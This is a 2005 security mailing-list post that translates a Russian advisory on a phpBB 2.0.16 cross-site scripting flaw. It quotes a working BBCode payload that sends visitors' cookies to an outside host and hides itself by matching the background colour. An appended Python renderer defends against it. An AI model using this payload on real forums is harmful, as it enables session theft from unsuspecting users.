[Secure-testing-team] Anyone speaking Russian among you?
Steve Langasek
vorlon at dodds.net
Wed Jul 6 09:51:17 UTC 2005
On Wed, Jul 06, 2005 at 11:20:45AM +0200, Moritz Muehlenhoff wrote:
> Hi,
> These advisories on phpbb2 have been posted to Bugtraq. Unfortunately
> they are written in Russian:
> http://www.securitylab.ru/55612.html
Cross-site scripting with phpbb forums
Program: phpbb 2.0.16
Severity: low
Exploit available: yes
Description: a vulnerability in phpbb forum allows a remote user to carry
out an XSS attack.
The remote user can insert a specially constructed combination of BB tags
into forum messages to cause arbitrary code execution in the browser of a
user that views the malicious message. The vulnerability can be used to
steal the user's private information (session IDs or cookies).
Sample exploit:
[color=#EFEFEF][url]www.ut[url=www.s=''
style='font-size:0;color:#EFEFEF
'style='top:expression(eval(this.sss));
'sss=`i=new/**/Image();
i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
this.sss=null`style='font-size:0;]
[/url][/url]'[/color]
Replace ЦВЕТ_ФОНА (BACKGROUND_COLOR) with the value for the message
background used by this forum skin. For the standard subsilver this is
#EFEFEF. This is done so that the introduction of the exploit is not
noticeable to the naked eye in other browsers where the code doesn't work,
yadda yadda.
Author's URL: http://www.phpbb.com
Solution: there is no fix for this vulnerability at present.
Curiously, this seems to be nothing more than a bad copy from the second
advisory, since there is obviously no occurrence of ЦВЕТ_ФОНА in the sample
exploit provided...
> http://antichat.ru/txt/phpbb/
Neither provides any information about a fix. The second one does go into
more detail, but I'd imagine the sample exploit is the important part and
the rest is ignorable. If not, Babelfish seems to be a surprisingly usable
Russian-English translation dictionary -- I wonder why they can't do this
good a job on the other languages. :-)
--
Steve Langasek
postmodern programmer
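As an added example (not code from this list post or from phpBB), a strict BBCode renderer in Python that treats any [url=...] or [color=...] argument failing an allowlist check as literal escaped text, so the nested-quote trick in the sample exploit never lands inside an HTML attribute. The two post strings and the collector host name are constructed for the demonstration; the bare [url]text[/url] form is deliberately not rendered here.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample input: the advisory's nested-tag payload, collapsed to one line
# with a placeholder collector host.
MALICIOUS_POST = ("[color=#EFEFEF][url]www.ut[url=www.s='' style='font-size:0;color:#EFEFEF"
                  "'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();"
                  "i.src='http://collector.example.invalid/s.jpg?'+document.cookie;"
                  "this.sss=null`style='font-size:0;][/url][/url]'[/color]")
BENIGN_POST = "[color=#ff0000]see [url=http://www.phpbb.com]phpbb[/url][/color]"

COLOR_RE = re.compile(r"^#[0-9a-fA-F]{6}$")
TAG_RE = re.compile(r"\[(/?)(color|url)(?:=([^\]]*))?\]")

def valid_color(value):
    # Allowlist: exactly one #RRGGBB value, nothing that could extend a style attribute.
    return bool(value and COLOR_RE.match(value))

def valid_url(value):
    # Only absolute http(s) URLs; quotes, whitespace and angle brackets are never
    # valid here, so the "'' style=..." attribute-injection trick is rejected outright.
    if not value or any(c in value for c in "'\" \t<>"):
        return False
    p = urlparse(value)
    return p.scheme in ("http", "https") and bool(p.netloc)

def render(post):
    """Convert [color=#hex] and [url=http://...] BBCode to HTML, escaping all other
    text. Tags whose argument fails validation are emitted as escaped literal text."""
    out, pos, stack = [], 0, []
    for m in TAG_RE.finditer(post):
        out.append(html.escape(post[pos:m.start()]))
        pos = m.end()
        closing, name, arg = m.group(1) == "/", m.group(2), m.group(3)
        if closing:
            if stack and stack[-1] == name:
                stack.pop()
                out.append("</span>" if name == "color" else "</a>")
            else:
                out.append(html.escape(m.group(0)))  # unbalanced close: literal text
        elif name == "color" and valid_color(arg):
            stack.append(name)
            out.append('<span style="color:%s">' % arg)
        elif name == "url" and valid_url(arg):
            stack.append(name)
            out.append('<a href="%s">' % html.escape(arg, quote=True))
        else:
            out.append(html.escape(m.group(0)))  # invalid or bare tag: literal text
    out.append(html.escape(post[pos:]))
    while stack:  # close anything left open so the output stays well-formed
        out.append("</span>" if stack.pop() == "color" else "</a>")
    return "".join(out)
```

Rendering MALICIOUS_POST yields a single colour span with the whole injected tag shown as escaped text, while BENIGN_POST renders as a normal coloured link.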